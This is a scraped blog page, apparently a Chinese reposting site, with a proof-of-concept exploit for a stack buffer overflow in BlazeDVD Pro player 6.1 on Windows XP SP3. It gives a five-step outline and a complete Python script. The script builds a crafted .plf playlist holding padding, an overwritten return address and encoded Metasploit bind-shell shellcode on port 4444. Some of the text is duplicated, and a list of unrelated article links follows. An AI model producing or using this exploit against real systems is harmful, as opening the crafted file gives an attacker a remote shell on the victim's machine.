exploit - simple stack overflow - BlazeDVD Pro player 6.1
2015-06-19 21:25
330 查看
Poc: BlazeDVD Pro player 6.1 Local stack based buffer overflow
PuN1sh3r show us how to exploit BlazeDVD Pro player 6.1 on Windows 2003 server sp1(EN).
Now, I’ll show you poc on Windows xp sp3.
How to exploit simple stack overflow ?
1. crash the program
2. find eip
3. filter bad chars
4. create shellcode
5. finish exploit code
PuN1sh3r show us how to exploit BlazeDVD Pro player 6.1 on Windows 2003 server sp1(EN).
Now, I’ll show you poc on Windows xp sp3.
#!/usr/bin/env python2 # -*- coding: utf8 -*- with open("exploit.plf", "w") as f: junk = "A" * 260 eip = "\x7B\x46\x86\x7C" # 7C86467B # eip = "\xD8\x9E\x24\x77" # 0x77249ed8 # badChars: 0x00, 0x0A, 0x1A # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= buf = "\x90" * 32 buf += "\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x53\xbf\xe9" buf += "\xe6\x11\xd6\x31\x78\x17\x83\xe8\xfc\x03\x91\xf5\xf3" buf += "\x23\x9d\x12\x71\xcb\x5d\xe3\x16\x45\xb8\xd2\x16\x31" buf += "\xc9\x45\xa7\x31\x9f\x69\x4c\x17\x0b\xf9\x20\xb0\x3c" buf += "\x4a\x8e\xe6\x73\x4b\xa3\xdb\x12\xcf\xbe\x0f\xf4\xee" buf += "\x70\x42\xf5\x37\x6c\xaf\xa7\xe0\xfa\x02\x57\x84\xb7" buf += "\x9e\xdc\xd6\x56\xa7\x01\xae\x59\x86\x94\xa4\x03\x08" buf += "\x17\x68\x38\x01\x0f\x6d\x05\xdb\xa4\x45\xf1\xda\x6c" buf += "\x94\xfa\x71\x51\x18\x09\x8b\x96\x9f\xf2\xfe\xee\xe3" buf += "\x8f\xf8\x35\x99\x4b\x8c\xad\x39\x1f\x36\x09\xbb\xcc" buf += "\xa1\xda\xb7\xb9\xa6\x84\xdb\x3c\x6a\xbf\xe0\xb5\x8d" buf += "\x6f\x61\x8d\xa9\xab\x29\x55\xd3\xea\x97\x38\xec\xec" buf += "\x77\xe4\x48\x67\x95\xf1\xe0\x2a\xf2\x36\xc9\xd4\x02" buf += "\x51\x5a\xa7\x30\xfe\xf0\x2f\x79\x77\xdf\xa8\x7e\xa2" buf += "\xa7\x26\x81\x4d\xd8\x6f\x46\x19\x88\x07\x6f\x22\x43" buf += "\xd7\x90\xf7\xfe\xdf\x37\xa8\x1c\x22\x87\x18\xa1\x8c" buf += "\x60\x73\x2e\xf3\x91\x7c\xe4\x9c\x3a\x81\x07\xb3\xe6" buf += "\x0c\xe1\xd9\x06\x59\xb9\x75\xe5\xbe\x72\xe2\x16\x95" buf += "\x2a\x84\x5f\xff\xed\xab\x5f\xd5\x59\x3b\xd4\x3a\x5e" buf += "\x5a\xeb\x16\xf6\x0b\x7c\xec\x97\x7e\x1c\xf1\xbd\xe8" buf += "\xbd\x60\x5a\xe8\xc8\x98\xf5\xbf\x9d\x6f\x0c\x55\x30" buf += "\xc9\xa6\x4b\xc9\x8f\x81\xcf\x16\x6c\x0f\xce\xdb\xc8" buf += "\x2b\xc0\x25\xd0\x77\xb4\xf9\x87\x21\x62\xbc\x71\x80" buf += "\xdc\x16\x2d\x4a\x88\xef\x1d\x4d\xce\xef\x4b\x3b\x2e" buf += "\x41\x22\x7a\x51\x6e\xa2\x8a\x2a\x92\x52\x74\xe1\x16" buf += "\x62\x3f\xab\x3f\xeb\xe6\x3e\x02\x76\x19\x95\x41\x8f" buf += "\x9a\x1f\x3a\x74\x82\x6a\x3f\x30\x04\x87\x4d\x29\xe1" buf += "\xa7\xe2\x4a\x20" nops = "\x90" * (2000 - len(junk) - len(eip) - len(buf)) payload = junk + eip + buf + nops f.write(payload)
How to exploit simple stack overflow ?
1. crash the program
2. find eip
3. filter bad chars
4. create shellcode
5. finish exploit code
相关文章推荐
- Cport 详细解释和应用
- 用链表写的拓扑排序模板
- Oracle 数据库安装总结(个人亲测)
- sprintf的用法
- Java学习日记之掌控硬盘(2)
- C++ 记录Windows程序崩溃时的dumpfile
- 心存感恩
- C#面向对象第六天总结
- linux shell脚本学习xargs命令使用详解
- (PHP)微信公众平台模拟登陆和发送消息详解
- QT入门心得
- pyQT实现自动找茬游戏
- 使用sysfs创建LED驱动
- 第二十三讲 用if语句实现分支结构
- 【华为oj】图片整理
- 批量取出PHP BOM头
- python模块学习:os模块
- Redis数据类型之LIST类型
- Android SDK 百度网盘下载
- Numpy的tile函数